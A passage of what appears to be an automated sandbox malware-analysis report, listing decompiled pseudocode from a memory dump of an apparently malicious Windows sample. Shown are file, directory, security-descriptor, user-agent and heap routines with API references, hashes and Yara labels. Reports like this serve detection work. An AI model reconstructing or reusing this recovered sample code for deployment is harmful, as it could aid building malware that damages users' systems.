				if(E0008BB8D(_t70) == 0) {
					_t23 = E00082BA4( &_v1084, _t70, 0x104); // executed
					_pop(_t54);
					__eflags = _t23;
					if(__eflags == 0) {
						_t71 = E00082C64( &_v1084, __eflags);
					} else {
						E0008B012(_t54,  &_v564); // executed
						_t32 = E0008109A(_t54, 0x375);
						_push(0);
						_v12 = _t32;
						_push( &_v44);
						_t60 = "\\";
						_push(_t60);
						_push(_t32);
						_push(_t60);
						_push( &_v564);
						_push(_t60);
						_t71 = E000892E5( &_v1084);
						E000885D5( &_v12);
					}
				} else {
					_t38 = E0008109A(_t52, 0x4e0);
					 *_t73 = 0x104;
					_v12 = _t38;
					_t39 =  *0x9e684; // 0xe9f8f0
					_t40 =  *((intOrPtr*)(_t39 + 0xe0))(_t38,  &_v564);
					_t78 = _t40;
					if(_t40 != 0) {
						_t41 = E0008109A( &_v564, 0x375);
						_push(0);
						_v8 = _t41;
						_push( &_v44);
						_t63 = "\\";
						_push(_t63);
						_push(_t41);
						_push(_t63);
						_t71 = E000892E5( &_v564);
						E000885D5( &_v8);
					} else {
						_t71 = E00082C64( &_v44, _t78);
					}
					E000885D5( &_v12);
				}
				_v8 = _t71;
				_t25 = E0008B269(_t71);
				if(_t25 == 0) {
					_t27 = CreateDirectoryW(_t71, _t25); // executed
					if(_t27 == 0 || E0008B269(_t71) == 0) {
						E0008861A( &_v8, 0xfffffffe);
						_t71 = _v8;
					}
				}
				return _t71;
			}

0x00082c9e
0x00082ca0
0x00082ca3
0x00082ca9
0x00082cb2
0x00082d36
0x00082d3b
0x00082d3c
0x00082d3e
0x00082d8f
0x00082d40
0x00082d46
0x00082d50
0x00082d55
0x00082d5a
0x00082d5d
0x00082d5e
0x00082d63
0x00082d64
0x00082d65
0x00082d6c
0x00082d6d
0x00082d7a
0x00082d80
0x00082d85
0x00082cb4
0x00082cb9
0x00082cbe
0x00082ccc
0x00082cd0
0x00082cd5
0x00082cdb
0x00082cdd
0x00082ced
0x00082cf2
0x00082cf7
0x00082cfa
0x00082cfb
0x00082d00
0x00082d01
0x00082d02
0x00082d0f
0x00082d15
0x00082cdf
0x00082ce4
0x00082ce4
0x00082d21
0x00082d26
0x00082d93
0x00082d96
0x00082d9d
0x00082da1
0x00082da9
0x00082dbc
0x00082dc1
0x00082dc5
0x00082da9
0x00082dca

APIs

CreateDirectoryW.KERNELBASE(00000000,00000000,00000000), ref: 00082DA1

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 9f56370e500a6f4cfac612b82a016e3664746281a383755eb8493c24e85cfb68
Instruction ID: 661ddabdbbf5835fe1c09d22864260864737aa38d39f94c9f57271a24964c515
Opcode Fuzzy Hash: 9f56370e500a6f4cfac612b82a016e3664746281a383755eb8493c24e85cfb68
Instruction Fuzzy Hash: D931A4B1914314AADB24FBA4CC51AFE77ACBF04350F040169F985E3182EF749F408BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00085AFF, Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00085AFF(intOrPtr __edx, void* __fp0) {
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				intOrPtr* _t22;
				intOrPtr _t23;
				signed int _t30;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				signed int _t47;
				void* _t55;

				_t55 = __fp0;
				_t45 = __edx;
				_t47 = 0;
				_t22 = E00088604(0x14);
				_t38 =  *0x9e688; // 0xb0000
				_t46 = _t22;
				if( *((short*)(_t38 + 0x22a)) == 0x3a) {
					_v36 =  *((intOrPtr*)(_t38 + 0x228));
					_v34 =  *((intOrPtr*)(_t38 + 0x22a));
					_v32 =  *((intOrPtr*)(_t38 + 0x22c));
					_v30 = 0;
					GetDriveTypeW( &_v36); // executed
				}
				 *_t46 = 2;
				 *(_t46 + 4) = _t47;
				_t23 =  *0x9e688; // 0xb0000
				 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t23 + 0x224));
				_t40 = E00085A7B( *((intOrPtr*)(_t23 + 0x224)), _t45, _t55);
				 *((intOrPtr*)(_t46 + 0xc)) = _t40;
				if(_t40 == 0) {
					L9:
					if(E00082DCB() == 0) {
						goto L11;
					} else {
						_t47 = _t47 | 0xffffffff;
					}
				} else {
					_t45 =  *_t40;
					_t30 = _t47;
					if(_t45 == 0) {
						goto L9;
					} else {
						_t44 =  *((intOrPtr*)(_t40 + 4));
						while( *((intOrPtr*)(_t44 + _t30 * 8)) != 0x3b) {
							_t30 = _t30 + 1;
							if(_t30 < _t45) {
								continue;
							} else {
								goto L9;
							}
							goto L12;
						}
						if( *((intOrPtr*)(_t44 + 4 + _t30 * 8)) != _t47) {
							L11:
							E00084D6D(_t46, _t45, _t55);
						} else {
							goto L9;
						}
					}
				}
				L12:
				E0008A39E();
				E0008A39E();
				return _t47;
			}

0x00085aff
0x00085aff
0x00085b0a
0x00085b0c
0x00085b12
0x00085b18
0x00085b22
0x00085b2b
0x00085b36
0x00085b41
0x00085b47
0x00085b4f
0x00085b4f
0x00085b55
0x00085b5b
0x00085b5e
0x00085b69
0x00085b71
0x00085b73
0x00085b78
0x00085b98
0x00085b9f
0x00000000
0x00085ba1
0x00085ba1
0x00085ba1
0x00085b7a
0x00085b7a
0x00085b7c
0x00085b80
0x00000000
0x00085b82
0x00085b82
0x00085b85
0x00085b8b
0x00085b8e
0x00000000
0x00085b90
0x00000000
0x00085b90
0x00000000
0x00085b8e
0x00085b96
0x00085ba6
0x00085ba8
0x00000000
0x00000000
0x00000000
0x00085b96
0x00085b80
0x00085bad
0x00085bb0
0x00085bb8
0x00085bc3

APIs

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

GetDriveTypeW.KERNELBASE(?), ref: 00085B4F

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AllocateDriveHeapType
String ID:
API String ID: 414167704-0
Opcode ID: cb03de1a2ba3e6c236d1db646638ddc4e840487864a8cce90740a25b4b3f0c80
Instruction ID: 556f522260d7e6bdf941df906934654c795a6f01da19a51ea332bd0742bdc193
Opcode Fuzzy Hash: cb03de1a2ba3e6c236d1db646638ddc4e840487864a8cce90740a25b4b3f0c80
Instruction Fuzzy Hash: C4213638600B169BC714BFA4DC489ADB7B0FF58325B24813EE49587392FB32C842CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0008BC7A, Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E0008BC7A(void* __ecx, void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _t18;
				intOrPtr _t19;
				intOrPtr _t27;
				intOrPtr _t30;
				intOrPtr _t36;
				intOrPtr _t38;
				char _t39;

				_t39 = 0;
				_t38 =  *0x9e674; // 0x1e4
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_t18 = E000895E1(__ecx, 0x84b);
				_push(0);
				_v24 = _t18;
				_push( &_v8);
				_push(1);
				_push(_t18);
				_t19 =  *0x9e68c; // 0xe9fab8
				if( *((intOrPtr*)(_t19 + 0x84))() != 0) {
					_push( &_v16);
					_push( &_v12);
					_push( &_v20);
					_t27 =  *0x9e68c; // 0xe9fab8
					_push(_v8);
					if( *((intOrPtr*)(_t27 + 0x88))() != 0) {
						_push(_v12);
						_t30 =  *0x9e68c; // 0xe9fab8
						_push(0);
						_push(0);
						_push(0);
						_push(0x10);
						_push(6);
						_push(_t38); // executed
						if( *((intOrPtr*)(_t30 + 0x8c))() == 0) {
							_t39 = 1;
						}
					}
					_t36 =  *0x9e68c; // 0xe9fab8
					 *((intOrPtr*)(_t36 + 0x10))(_v8);
				}
				E000885D5( &_v24);
				return _t39;
			}

0x0008bc81
0x0008bc84
0x0008bc8f
0x0008bc92
0x0008bc95
0x0008bc98
0x0008bc9b
0x0008bca1
0x0008bca5
0x0008bca8
0x0008bca9
0x0008bcab
0x0008bcac
0x0008bcb9
0x0008bcbe
0x0008bcc2
0x0008bcc6
0x0008bcc7
0x0008bccc
0x0008bcd7
0x0008bcd9
0x0008bcdc
0x0008bce1
0x0008bce2
0x0008bce3
0x0008bce4
0x0008bce6
0x0008bce8
0x0008bcf1
0x0008bcf3
0x0008bcf3
0x0008bcf1
0x0008bcf4
0x0008bcfd
0x0008bcfd
0x0008bd04
0x0008bd0f

APIs

SetSecurityInfo.ADVAPI32(000001E4,00000006,00000010,00000000,00000000,00000000,?,?,00083268,?,?,00000000,?,?,?,00085721), ref: 0008BCE9

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: InfoSecurity
String ID:
API String ID: 3528565900-0
Opcode ID: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
Instruction ID: 4b82ffe8c45477c1650446b5343723a2aeaa491c0a074740823efd8a3710dd5b
Opcode Fuzzy Hash: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
Instruction Fuzzy Hash: 54113A72A00219BBDB10EF95DC49EEEBBBCFF04740F1040A6B545E7151DBB09A01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0008E450, Relevance: 1.5, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0008E450(void* __ecx, void* __edx) {
				char _v8;
				intOrPtr* _t5;
				intOrPtr _t10;
				intOrPtr* _t11;
				void* _t12;

				_push(__ecx);
				_t5 =  *0x9e6b0; // 0xe7f550
				if( *_t5 == 0) {
					_v8 = E000895C7(0x2a7);
					 *0x9e788 = E000891A6(_t6, 0);
					E000885C2( &_v8);
					goto L4;
				} else {
					_v8 = 0x100;
					_t10 = E00088604(0x101);
					 *0x9e788 = _t10;
					_t11 =  *0x9e6b0; // 0xe7f550
					_t12 =  *_t11(0, _t10,  &_v8); // executed
					if(_t12 == 0) {
						L4:
						return 0;
					} else {
						return E0008861A(0x9e788, 0xffffffff) | 0xffffffff;
					}
				}
			}

0x0008e453
0x0008e454
0x0008e45c
0x0008e4a6
0x0008e4b3
0x0008e4b8
0x00000000
0x0008e45e
0x0008e463
0x0008e46a
0x0008e473
0x0008e47a
0x0008e481
0x0008e485
0x0008e4bd
0x0008e4c0
0x0008e487
0x0008e499
0x0008e499
0x0008e485

APIs

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

ObtainUserAgentString.URLMON(00000000,00000000,00000100,00000100,?,0008E4F7), ref: 0008E481

Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: Heap$AgentAllocateFreeObtainStringUser
String ID:
API String ID: 471734292-0
Opcode ID: b424cfbd32e5a4a4fc9b59087bcc82cf40a6a26874494f9add4b8dc47a0913b5
Instruction ID: f91671ab82a028632dec16c50dcaaaafc6d594eba443ed6fbe21b10f95aa2484
Opcode Fuzzy Hash: b424cfbd32e5a4a4fc9b59087bcc82cf40a6a26874494f9add4b8dc47a0913b5
Instruction Fuzzy Hash: 76F0CD30608240EBFB84FBB4DC4AAA977E0BB10324F644259F056D32D2EEB49D009715

Uniqueness

Uniqueness Score: -1.00%

Function 0008A65C, Relevance: 1.5, APIs: 1, Instructions: 37
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0008A65C(void* __ecx, void* __edx, intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _t13;
				void* _t21;
				void* _t23;
				void* _t26;

				_t23 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t26 = 0;
				_v12 = __ecx;
				_t21 = __edx;
				if(_a4 == 0) {
					L3:
					_t13 = 1;
				} else {
					while(1) {
						_v8 = _v8 & 0x00000000;
						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
							break;
						}
						_t26 = _t26 + _v8;
						_t23 = _v12;
						if(_t26 < _a4) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					_t13 = 0;
				}
				L4:
				return _t13;
			}

0x0008a65c
0x0008a65f
0x0008a660
0x0008a663
0x0008a665
0x0008a668
0x0008a66d
0x0008a69e
0x0008a6a0
0x0008a66f
0x0008a66f
0x0008a66f
0x0008a691
0x00000000
0x00000000
0x0008a693
0x0008a696
0x0008a69c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0008a69c
0x0008a6a5
0x0008a6a5
0x0008a6a1
0x0008a6a4

APIs

WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00088F51,?), ref: 0008A689

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
Instruction ID: 0b494a87cdc3703bbe533562170335e27c5b07854cca77c3918aadfd965e8834
Opcode Fuzzy Hash: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
Instruction Fuzzy Hash: 3EF01D72A10128BFEB10DF98C884BAA7BECFB05781F14416AB545E7144E670EE4087A1

Uniqueness

Uniqueness Score: -1.00%

Function 0008A5F7, Relevance: 1.5, APIs: 1, Instructions: 32
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008A5F7(WCHAR* __ecx, long __edx) {
				intOrPtr _t6;
				long _t12;
				void* _t13;

				_t12 = __edx;
				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
				if(_t13 != 0xffffffff) {
					if(_t12 == 4) {
						_t6 =  *0x9e684; // 0xe9f8f0
						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
					}
					return _t13;
				}
				return 0;
			}

0x0008a601
0x0008a615
0x0008a61a
0x0008a623
0x0008a625
0x0008a62f
0x0008a62f
0x00000000
0x0008a635
0x00000000

APIs

CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,00088F39), ref: 0008A612

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
Instruction ID: b222d3866c60dc690caa0f3d26d08f48d1805b8db722e2ad4e11b8f14bdb970b
Opcode Fuzzy Hash: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
Instruction Fuzzy Hash: C1E0DFB23000147FFB206A689CC8F7B26ACF7967F9F060232F691C3290D6208C014371

Uniqueness

Uniqueness Score: -1.00%

Function 0008A63B, Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0008A63B(WCHAR* __ecx) {
				signed int _t5;

				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				_t2 = _t5 + 1; // 0x1
				asm("sbb ecx, ecx");
				return _t5 &  ~_t2;
			}

0x0008a64f
0x0008a652
0x0008a657
0x0008a65b

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,0008A6C9,00000000,00000400,00000000,0008F8B5,0008F8B5,?,0008FA56,00000000), ref: 0008A64F

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
Instruction ID: 701424f55706607c20a779b1f605f6a3a9bf58f01b0c22295887d68b81bdb902
Opcode Fuzzy Hash: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
Instruction Fuzzy Hash: FCD012B23A0100BEFB2C8B34CD5AF72329CE710701F22025C7A06EA0E1CA69E9048720

Uniqueness

Uniqueness Score: -1.00%

Function 00088604, Relevance: 1.5, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00088604(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x9e768, 8, _a4); // executed
				return _t2;
			}

0x00088612
0x00088619

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
Instruction ID: 357be25924eba7ef04d183b2a47d12fe0e858354009690af1988e616ee4df9af
Opcode Fuzzy Hash: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
Instruction Fuzzy Hash: 7FB09235084A08BBFE811B81ED09A847F69FB45A59F008012F608081708A6668649B82

Uniqueness

Uniqueness Score: -1.00%

Function 0008B269, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008B269(WCHAR* __ecx) {

				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
			}

0x0008b27c

APIs

GetFileAttributesW.KERNELBASE(00000000,00084E7B), ref: 0008B26F

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
Instruction ID: 2eec04d83ef220e7df840366bf7910a786624a5db3ebee8bff433549f6c66efd
Opcode Fuzzy Hash: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
Instruction Fuzzy Hash: A4B092B62200404BCA189B38998484D32906B182313220759B033C60E1D624C8509A00

Uniqueness

Uniqueness Score: -1.00%

Function 000885EF, Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000885EF() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x9e768 = _t1;
				return _t1;
			}

0x000885f8
0x000885fe
0x00088603

APIs

HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
Instruction ID: a1789a6bc8b77e7cca538026a270896d431aa116e0d29a0d1dd02ebd4a2bf545
Opcode Fuzzy Hash: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
Instruction Fuzzy Hash: E5B01270684700A6F2905B609C06B007550B340F0AF304003F704582D0CAB41004CB16

Uniqueness

Uniqueness Score: -1.00%

Function 0008F9BF, Relevance: 1.4, APIs: 1, Instructions: 119
sleepCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0008F9BF(void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _t26;
				char _t27;
				intOrPtr _t29;
				void* _t31;
				void* _t36;
				char _t38;
				intOrPtr _t39;
				char _t42;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr* _t63;
				intOrPtr _t66;
				char* _t67;
				intOrPtr _t69;
				char _t78;
				void* _t81;
				void* _t82;

				_t26 =  *0x9e654; // 0xe9fd30
				_t27 = E00088604( *((intOrPtr*)(_t26 + 4))); // executed
				_v12 = _t27;
				if(_t27 != 0) {
					_t63 =  *0x9e654; // 0xe9fd30
					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
						E000886E1(_t27,  *_t63, 0x400);
						_v8 = 0;
						_t36 = E0008109A(_t63, 0x34a);
						_t66 =  *0x9e688; // 0xb0000
						_t72 =  !=  ? 0x67d : 0x615;
						_t38 = E000895E1(_t66,  !=  ? 0x67d : 0x615);
						_push(0);
						_push(_t36);
						_t67 = "\\";
						_v24 = _t38;
						_push(_t67);
						_push(_t38);
						_t39 =  *0x9e688; // 0xb0000
						_push(_t67);
						_v20 = E000892E5(_t39 + 0x1020);
						_t42 = E0008A6A9( &_v8, _t41,  &_v8); // executed
						_v16 = _t42;
						E000885D5( &_v24);
						E000885D5( &_v20);
						_t73 = _v16;
						_t82 = _t81 + 0x3c;
						_t69 = _v8;
						if(_v16 != 0 && _t69 > 0x400) {
							_t51 =  *0x9e654; // 0xe9fd30
							_t52 =  *((intOrPtr*)(_t51 + 4));
							_t53 =  <  ? _t69 : _t52;
							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
							E000886E1(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
							_t69 = _v8;
							_t82 = _t82 + 0xc;
						}
						E0008861A( &_v16, _t69);
						E0008861A( &_v20, 0xfffffffe);
						_t27 = _v12;
						_t81 = _t82 + 0x10;
						_t63 =  *0x9e654; // 0xe9fd30
					}
					_t78 = 0;
					while(1) {
						_t29 =  *0x9e688; // 0xb0000
						_t31 = E0008A77D(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
						_t81 = _t81 + 0xc;
						if(_t31 >= 0) {
							break;
						}
						Sleep(1);
						_t78 = _t78 + 1;
						if(_t78 < 0x2710) {
							_t27 = _v12;
							_t63 =  *0x9e654; // 0xe9fd30
							continue;
						}
						break;
					}
					E0008861A( &_v12, 0);
				}
				return 0;
			}

0x0008f9c5
0x0008f9cd
0x0008f9d2
0x0008f9d8
0x0008f9de
0x0008f9f1
0x0008f9fb
0x0008fa05
0x0008fa08
0x0008fa0d
0x0008fa23
0x0008fa27
0x0008fa2c
0x0008fa2d
0x0008fa2e
0x0008fa33
0x0008fa36
0x0008fa37
0x0008fa38
0x0008fa3d
0x0008fa4c
0x0008fa51
0x0008fa56
0x0008fa5d
0x0008fa66
0x0008fa6b
0x0008fa6e
0x0008fa71
0x0008fa76
0x0008fa7c
0x0008fa81
0x0008fa86
0x0008fa89
0x0008fa9c
0x0008faa1
0x0008faa4
0x0008faa4
0x0008faac
0x0008fab7
0x0008fabc
0x0008fabf
0x0008fac2
0x0008fac2
0x0008fac8
0x0008faca
0x0008face
0x0008fad9
0x0008fade
0x0008fae3
0x00000000
0x00000000
0x0008faec
0x0008faf2
0x0008faf9
0x0008fafb
0x0008fafe
0x00000000
0x0008fafe
0x00000000
0x0008faf9
0x0008fb0b
0x0008fb14
0x0008fb18

APIs

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,0008F8B5,?,?,?,0008FCB9,00000000), ref: 0008FAEC

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeapSleep
String ID:
API String ID: 4201116106-0
Opcode ID: d8e14ba9050a3f449a66642c026c32f035b024aed90037a6f4558c27f2baf7d1
Instruction ID: 732f9496a7e373a88c7c7ec427939724ae18ee305fc23bc779ce3543d22a3d2a
Opcode Fuzzy Hash: d8e14ba9050a3f449a66642c026c32f035b024aed90037a6f4558c27f2baf7d1
Instruction Fuzzy Hash: EA417CB2A00104ABEB04FBA4DD85EAE77BDFF54310B14407AF545E7242EB38AE15CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0008896F, Relevance: 1.4, APIs: 1, Instructions: 107
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0008896F(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
				char _v8;
				WCHAR* _v12;
				signed int _v16;
				WCHAR* _v20;
				short _t30;
				short _t33;
				intOrPtr _t38;
				intOrPtr _t43;
				intOrPtr _t45;
				short _t49;
				void* _t52;
				char _t71;
				WCHAR* _t72;

				_v16 = _v16 & 0x00000000;
				_t71 = 0;
				_v12 = __ecx;
				_t49 = __edx;
				_v8 = 0;
				_t72 = E00088604(0x448);
				_v20 = _t72;
				_pop(_t52);
				if(_t72 != 0) {
					_t72[0x21a] = __edx;
					_t72[0x21c] = _a8;
					lstrcpynW(_t72, _v12, 0x200);
					if(_t49 != 1) {
						_t30 = E00088604(0x100000);
						_t72[0x212] = _t30;
						if(_t30 != 0) {
							_t69 = _a4;
							_t72[0x216] = 0x100000;
							if(_a4 != 0) {
								E000887EA(_t72, _t69);
							}
							L16:
							return _t72;
						}
						L7:
						if(_t71 != 0) {
							E0008861A( &_v8, 0);
						}
						L9:
						_t33 = _t72[0x218];
						if(_t33 != 0) {
							_t38 =  *0x9e684; // 0xe9f8f0
							 *((intOrPtr*)(_t38 + 0x30))(_t33);
						}
						_t73 =  &(_t72[0x212]);
						if(_t72[0x212] != 0) {
							E0008861A(_t73, 0);
						}
						E0008861A( &_v20, 0);
						goto L1;
					}
					_t43 = E0008A6A9(_t52, _v12,  &_v16); // executed
					_t71 = _t43;
					_v8 = _t71;
					if(_t71 == 0) {
						goto L9;
					}
					if(E00088815(_t72, _t71, _v16, _a4) < 0) {
						goto L7;
					} else {
						_t45 =  *0x9e684; // 0xe9f8f0
						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
						_t72[0x218] = _t72[0x218] & 0x00000000;
						E0008861A( &_v8, 0);
						goto L16;
					}
				}
				L1:
				return 0;
			}

0x00088975
0x0008897c
0x0008897e
0x00088986
0x00088988
0x00088990
0x00088992
0x00088995
0x00088998
0x000889ac
0x000889b3
0x000889b9
0x000889c2
0x00088a1a
0x00088a1f
0x00088a28
0x00088a75
0x00088a78
0x00088a80
0x00088a84
0x00088a84
0x00088a89
0x00000000
0x00088a89
0x00088a2a
0x00088a2c
0x00088a34
0x00088a3a
0x00088a3b
0x00088a3b
0x00088a43
0x00088a46
0x00088a4b
0x00088a4b
0x00088a4e
0x00088a57
0x00088a5c
0x00088a62
0x00088a69
0x00000000
0x00088a6f
0x000889cb
0x000889d0
0x000889d2
0x000889d9
0x00000000
0x00000000
0x000889ee
0x00000000
0x000889f0
0x000889f0
0x000889fb
0x000889fe
0x00088a0b
0x00000000
0x00088a11
0x000889ee
0x0008899a
0x00000000

APIs

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000003), ref: 000889B9

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeaplstrcpyn
String ID:
API String ID: 680773602-0
Opcode ID: c65104c4580448df579982b77da1fe20a4a8eb4abc469e1e1d71d72c02039485
Instruction ID: 64513cba4c22b50501068f9bc6ddcaf5db25fa6591ecaf2876deda848e4e3f01
Opcode Fuzzy Hash: c65104c4580448df579982b77da1fe20a4a8eb4abc469e1e1d71d72c02039485
Instruction Fuzzy Hash: F831A476A00704EFEB24AB64D845B9E77E9FF40720FA4802AF58597182EF30A9008759

Uniqueness

Uniqueness Score: -1.00%

Function 0008E2C6, Relevance: 1.3, APIs: 1, Instructions: 92
sleepCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0008E2C6(void* __fp0, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _v24;
				void* _v28;
				char _v32;
				char _v544;
				signed int _t40;
				intOrPtr _t41;
				intOrPtr _t48;
				intOrPtr _t58;
				void* _t65;
				intOrPtr _t66;
				void* _t70;
				signed int _t73;
				void* _t75;
				void* _t77;

				_t77 = __fp0;
				_v20 = 0;
				_v28 = 0;
				_v24 = 0;
				_t66 =  *0x9e6b4; // 0xe9fa98, executed
				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
				if(_t40 == 0) {
					_t73 = 0;
					if(_v20 <= 0) {
						L9:
						_t41 =  *0x9e6b4; // 0xe9fa98
						 *((intOrPtr*)(_t41 + 0xc))(_v8);
						return 0;
					}
					do {
						_v16 = 0;
						_v12 = 0;
						_t48 =  *0x9e68c; // 0xe9fab8
						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
						_t70 = E00088604(_v16 + 1);
						if(_t70 != 0) {
							_v12 = 0x200;
							_push( &_v32);
							_push( &_v12);
							_push( &_v544);
							_push( &_v16);
							_push(_t70);
							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
							_t58 =  *0x9e68c; // 0xe9fab8
							_push(0);
							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
								E00084905(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
